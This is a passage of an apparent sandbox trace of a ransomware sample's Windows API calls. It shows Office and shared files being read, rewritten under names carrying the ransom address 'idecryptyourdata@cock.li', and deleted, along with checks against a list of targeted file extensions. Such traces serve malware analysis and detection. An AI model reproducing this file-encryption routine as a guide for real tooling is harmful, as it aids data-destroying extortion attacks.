Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0200.553] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0212953.wmf")) returned 1 [0200.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF") returned 68 [0200.553] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF") returned 68 [0200.553] lstrlenW (lpString=".doc") returned 4 [0200.553] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0200.553] lstrlenW (lpString=".docx") returned 5 [0200.554] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0200.554] lstrlenW (lpString=".pdf") returned 4 [0200.554] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0200.554] lstrlenW (lpString=".xls") returned 4 [0200.554] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0200.554] lstrlenW (lpString=".xlsx") returned 5 [0200.554] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0200.554] lstrlenW (lpString=".ppt") returned 4 [0200.554] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0200.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF") returned 68 [0200.554] lstrlenW (lpString=".zip") returned 4 [0200.554] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0200.554] lstrlenW (lpString=".rar") returned 4 [0200.554] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0200.554] lstrlenW (lpString=".bz2") returned 4 [0200.554] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0200.554] lstrlenW (lpString=".7z") returned 3 [0200.554] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0200.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF") returned 68 [0200.554] lstrlenW (lpString=".dbf") returned 4 [0200.554] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0200.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF") returned 68 [0200.554] lstrlenW (lpString=".1cd") returned 4 [0200.554] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0200.554] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0212953.WMF") returned 68 [0200.554] lstrlenW (lpString=".jpg") returned 4 [0200.554] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0200.555] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.555] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0200.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213243.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0200.562] GetLastError () returned 0x0 [0200.562] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0xa5c, lpOverlapped=0x0) returned 1 [0201.712] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xa60, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xa60, lpOverlapped=0x0) returned 1 [0201.713] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.713] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.713] SetEndOfFile (hFile=0x340) returned 1 [0201.713] CloseHandle (hObject=0x340) returned 1 [0201.713] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.714] SetEndOfFile (hFile=0x37c) returned 1 [0201.714] CloseHandle (hObject=0x37c) returned 1 [0201.715] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.715] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0213243.wmf")) returned 1 [0201.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF") returned 68 [0201.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF") returned 68 [0201.715] lstrlenW (lpString=".doc") returned 4 [0201.716] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0201.716] lstrlenW (lpString=".docx") returned 5 [0201.716] lstrcmpiW (lpString1=".docx", lpString2="3.WMF") returned -1 [0201.716] lstrlenW (lpString=".pdf") returned 4 [0201.716] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0201.716] lstrlenW (lpString=".xls") returned 4 [0201.716] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0201.716] lstrlenW (lpString=".xlsx") returned 5 [0201.716] lstrcmpiW (lpString1=".xlsx", lpString2="3.WMF") returned -1 [0201.716] lstrlenW (lpString=".ppt") returned 4 [0201.716] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0201.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF") returned 68 [0201.716] lstrlenW (lpString=".zip") returned 4 [0201.716] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.716] lstrlenW (lpString=".rar") returned 4 [0201.716] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.716] lstrlenW (lpString=".bz2") returned 4 [0201.716] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0201.716] lstrlenW (lpString=".7z") returned 3 [0201.716] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0201.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF") returned 68 [0201.716] lstrlenW (lpString=".dbf") returned 4 [0201.716] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF") returned 68 [0201.716] lstrlenW (lpString=".1cd") returned 4 [0201.716] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0201.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0213243.WMF") returned 68 [0201.716] lstrlenW (lpString=".jpg") returned 4 [0201.716] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0201.717] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.717] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.717] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216874.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0201.718] GetLastError () returned 0x0 [0201.718] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x9b3a, lpOverlapped=0x0) returned 1 [0201.803] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x9b40, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x9b40, lpOverlapped=0x0) returned 1 [0201.805] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.805] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.805] SetEndOfFile (hFile=0x340) returned 1 [0201.805] CloseHandle (hObject=0x340) returned 1 [0201.806] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.806] SetEndOfFile (hFile=0x37c) returned 1 [0201.807] CloseHandle (hObject=0x37c) returned 1 [0201.807] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.807] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0216874.wmf")) returned 1 [0201.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF") returned 68 [0201.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF") returned 68 [0201.808] lstrlenW (lpString=".doc") returned 4 [0201.808] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0201.808] lstrlenW (lpString=".docx") returned 5 [0201.808] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0201.808] lstrlenW (lpString=".pdf") returned 4 [0201.808] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0201.808] lstrlenW (lpString=".xls") returned 4 [0201.808] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0201.808] lstrlenW (lpString=".xlsx") returned 5 [0201.808] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0201.808] lstrlenW (lpString=".ppt") returned 4 [0201.808] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0201.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF") returned 68 [0201.808] lstrlenW (lpString=".zip") returned 4 [0201.808] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.808] lstrlenW (lpString=".rar") returned 4 [0201.808] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.808] lstrlenW (lpString=".bz2") returned 4 [0201.808] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0201.808] lstrlenW (lpString=".7z") returned 3 [0201.808] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0201.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF") returned 68 [0201.808] lstrlenW (lpString=".dbf") returned 4 [0201.808] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.808] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF") returned 68 [0201.809] lstrlenW (lpString=".1cd") returned 4 [0201.809] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0201.809] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0216874.WMF") returned 68 [0201.809] lstrlenW (lpString=".jpg") returned 4 [0201.809] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0201.809] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.809] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228959.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0201.810] GetLastError () returned 0x0 [0201.810] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x918c, lpOverlapped=0x0) returned 1 [0201.853] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x9190, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x9190, lpOverlapped=0x0) returned 1 [0201.856] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.856] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.856] SetEndOfFile (hFile=0x340) returned 1 [0201.856] CloseHandle (hObject=0x340) returned 1 [0201.856] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.856] SetEndOfFile (hFile=0x37c) returned 1 [0201.857] CloseHandle (hObject=0x37c) returned 1 [0201.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0201.858] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0228959.wmf")) returned 1 [0201.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF") returned 68 [0201.858] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF") returned 68 [0201.858] lstrlenW (lpString=".doc") returned 4 [0201.858] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0201.858] lstrlenW (lpString=".docx") returned 5 [0201.858] lstrcmpiW (lpString1=".docx", lpString2="9.WMF") returned -1 [0201.859] lstrlenW (lpString=".pdf") returned 4 [0201.859] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0201.859] lstrlenW (lpString=".xls") returned 4 [0201.859] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0201.859] lstrlenW (lpString=".xlsx") returned 5 [0201.859] lstrcmpiW (lpString1=".xlsx", lpString2="9.WMF") returned -1 [0201.859] lstrlenW (lpString=".ppt") returned 4 [0201.859] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0201.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF") returned 68 [0201.859] lstrlenW (lpString=".zip") returned 4 [0201.859] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0201.859] lstrlenW (lpString=".rar") returned 4 [0201.859] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0201.859] lstrlenW (lpString=".bz2") returned 4 [0201.859] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0201.859] lstrlenW (lpString=".7z") returned 3 [0201.859] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0201.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF") returned 68 [0201.859] lstrlenW (lpString=".dbf") returned 4 [0201.859] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0201.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF") returned 68 [0201.859] lstrlenW (lpString=".1cd") returned 4 [0201.859] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0201.859] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0228959.WMF") returned 68 [0201.859] lstrlenW (lpString=".jpg") returned 4 [0201.859] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0201.860] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.860] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.860] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232171.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232171.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0201.861] GetLastError () returned 0x0 [0201.861] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x332a, lpOverlapped=0x0) returned 1 [0201.919] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x3330, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x3330, lpOverlapped=0x0) returned 1 [0201.920] ReadFile (in: hFile=0x37c, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.920] WriteFile (in: hFile=0x340, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0201.920] SetEndOfFile (hFile=0x340) Thread: id = 92 os_tid = 0xa94 [0178.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x3c20930 [0178.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10000) returned 0x3c30938 [0178.037] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6dde08 [0178.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x6) returned 0x70c180 [0178.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6dde20 [0178.038] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100000) returned 0x3e23020 [0178.040] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6dde80 [0178.041] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6dde80, Size=0x20) returned 0x6beea8 [0178.041] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x6ddeb0 [0178.041] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x6ddeb0, Size=0x20) returned 0x6bef48 [0178.041] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77050000 [0178.041] GetProcAddress (hModule=0x77050000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77066b30 [0178.041] Wow64DisableWow64FsRedirection (in: OldValue=0x325ff50 | out: OldValue=0x325ff50*=0x0) returned 1 [0178.041] lstrlenW (lpString="kernel32.dll") returned 12 [0178.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6beea8 | out: hHeap=0x680000) returned 1 [0178.041] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0178.041] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x680000) returned 1 [0178.041] Sleep (dwMilliseconds=0x64) [0178.267] Sleep (dwMilliseconds=0x64) [0178.499] Sleep (dwMilliseconds=0x64) [0179.002] lstrcmpiW (lpString1=".dat", lpString2=".bat") returned 1 [0179.002] lstrlenW (lpString="hwrcommonlm.dat") returned 15 [0179.002] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0179.003] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x325ff14 | out: lpFileSize=0x325ff14*=46624) returned 1 [0179.003] CloseHandle (hObject=0x340) returned 1 [0179.003] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat")) returned 0x20 [0179.003] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 66 [0179.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 66 [0179.004] lstrlenW (lpString=".doc") returned 4 [0179.004] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0179.004] lstrlenW (lpString=".docx") returned 5 [0179.004] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0179.004] lstrlenW (lpString=".pdf") returned 4 [0179.004] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0179.004] lstrlenW (lpString=".xls") returned 4 [0179.004] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0179.004] lstrlenW (lpString=".xlsx") returned 5 [0179.004] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0179.004] lstrlenW (lpString=".ppt") returned 4 [0179.004] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0179.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 66 [0179.004] lstrlenW (lpString=".zip") returned 4 [0179.004] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0179.004] lstrlenW (lpString=".rar") returned 4 [0179.004] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0179.004] lstrlenW (lpString=".bz2") returned 4 [0179.004] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0179.004] lstrlenW (lpString=".7z") returned 3 [0179.004] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0179.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 66 [0179.004] lstrlenW (lpString=".dbf") returned 4 [0179.004] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0179.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 66 [0179.004] lstrlenW (lpString=".1cd") returned 4 [0179.004] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0179.004] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 66 [0179.004] lstrlenW (lpString=".jpg") returned 4 [0179.005] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0179.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 66 [0179.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 66 [0179.005] lstrlenW (lpString=".doc") returned 4 [0179.005] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0179.005] lstrlenW (lpString=".docx") returned 5 [0179.005] lstrcmpiW (lpString1=".docx", lpString2="m.dat") returned -1 [0179.005] lstrlenW (lpString=".pdf") returned 4 [0179.005] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0179.005] lstrlenW (lpString=".xls") returned 4 [0179.005] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0179.005] lstrlenW (lpString=".xlsx") returned 5 [0179.005] lstrcmpiW (lpString1=".xlsx", lpString2="m.dat") returned -1 [0179.005] lstrlenW (lpString=".ppt") returned 4 [0179.005] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0179.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 66 [0179.005] lstrlenW (lpString=".zip") returned 4 [0179.005] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0179.005] lstrlenW (lpString=".rar") returned 4 [0179.005] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0179.005] lstrlenW (lpString=".bz2") returned 4 [0179.005] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0179.005] lstrlenW (lpString=".7z") returned 3 [0179.005] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0179.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 66 [0179.005] lstrlenW (lpString=".dbf") returned 4 [0179.006] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0179.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrcommonlm.dat") returned 66 [0179.006] lstrlenW (lpString=".1cd") returned 4 [0179.006] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0179.006] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft 